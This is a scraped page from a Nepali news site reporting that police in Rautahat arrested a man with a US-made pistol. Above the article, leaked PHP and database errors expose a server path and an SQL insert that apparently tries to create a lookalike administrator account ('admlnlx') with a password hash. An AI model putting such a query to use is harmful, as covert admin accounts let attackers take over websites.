WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZUn2JyhTWNE48RgwyWtcmV6lvIvip/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 19:53:38', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
रौतहटमा हतियारसहित एक पक्राउ – Gaule Khabar

रौतहटमा हतियारसहित एक पक्राउ

रौतहटमा हतियारसहित एक पक्राउ

रौतहट मंसिर,२४ –

गौर-चन्द्रनिगाहपुर सडकखण्डको भेडियाहीबाट प्रहरीले एक जनालाई हतियारसहित पक्राउ गरेको छ ।मेड इन यूएसए लेखिएको अत्याधुनिक पेस्तोल सहित सखुअवा ८ का लालबाबु ठाकुर पक्राउ परेका हुन् ।

हतियार लिएर एक व्यक्ति भेडियाही तर्फ जाँदै गरेको भन्ने सूचनाका आधारमा ठाकुरलाई पक्राउ गरिएको जिल्ला प्रहरी कार्यालय रौतहटका प्रवक्ता डिएसपी नविनकृष्ण भण्डारीले बताए ।

पक्राउ परेका ठाकुरको साथबाट अत्याधुनिक पेस्तोल र त्यसको म्याग्जीन बरामद भएको साथै यसबारे आवश्यक अनुसन्धान भइरहेको डिएसपी भण्डारीले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका